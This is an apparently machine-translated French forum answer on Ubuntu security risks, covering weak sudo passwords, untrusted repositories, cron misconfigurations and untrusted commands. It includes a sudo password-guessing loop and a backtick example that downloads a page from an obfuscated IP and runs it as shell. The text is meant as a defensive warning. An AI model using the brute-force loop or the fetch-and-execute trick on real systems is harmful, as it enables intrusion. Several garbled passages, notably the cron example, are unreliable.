Cracking le mot de passe root lui-même n'est pas possible, car Ubuntu a désactivé l'utilisateur root par défaut. Cependant, si votre utilisateur peut devenir root via sudo et que votre mot de passe est facile à deviner / brute-force, vous avez un système non sécurisé. Exemple de script essayant de tester un mot de passe:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
L'ajout d'un référentiel non approuvé permet d'installer les programmes de ce référentiel. Même si vous n'installez pas explicitement une application comme sudo apt-get install [app-from-repo]
, le référentiel peut toujours affecter d'autres programmes en faisant croire à Ubuntu que le référentiel contient une version plus récente d'un programme donné.
Le processus de mise à jour est exécuté en tant que root, sinon les fichiers ne peuvent pas être écrits dans /usr/bin
ou /etc
. Un déclencheur d'installation est également exécuté en tant que root et peut s'exécuter de manière arbitraire et éventuellement avec des commandes nuisibles. Maintenant, ne vous inquiétez pas, une action manuelle est nécessaire pour mettre à jour les programmes et les dépôts Ubuntu sont sécurisés. Les logiciels fermés comme Windows ne peuvent jamais être totalement fiables car vous ne pouvez pas rechercher le code malveillant dans la source, mais vous pouvez consulter la source de l'application Ubuntu si nécessaire (ne s'applique pas aux programmes propriétaires tels que sun-java6
ou Flash). / p>
Comme mentionné par Javier Rivera, les bogues du noyau peuvent conduire à l'exécution de code arbitraire, mais les logiciels buggés sont peut-être aussi dangereux, en particulier les binaires racine buggé% coexistant (root) et les autres programmes exécutés. en tant que root.
Vous pouvez créer des failles de sécurité sur votre système si vous ne faites pas attention à ce que vous faites. Par exemple, sans bien comprendre le concept de cronjobs, vous avez ajouté un job cron à setsuid
qui exécute un programme dans votre dossier personnel (par exemple, /etc/cron.daily
. Si vous pouvez écrire le fichier myscript.sh en écriture, vous pouvez le supprimer). , un exploit pourrait placer du code malveillant dans /bin/sh /home/your-username/myscript.sh
qui serait exécuté en tant que root (augmentation de privilèges).
Pour rester en sécurité, utilisez votre esprit! Ne lancez pas de commandes provenant de sources non fiables si vous ne savez pas ce qu’il fait. Si quelqu'un dit exécuter myscript.sh
avec des back-ticks, ne le faites pas. 3221233674 est un autre moyen d'écrire 'curl 3221233674'
(IP de example.com). Donc, ce serait égal à:
'curl http://example.com/'
Ces back-ticks provoquent l'exécution de la sortie en tant que commandes shell. En clair, "Téléchargez la page lien et essayez d’exécuter la page téléchargée".
Au début, vous ne verriez pas quelque chose de malveillant dans la commande donnée. Mais maintenant, vous savez que cela peut être abusé aussi.
Vérifiez toujours les commandes / scripts provenant de sources non fiables, comme Internet.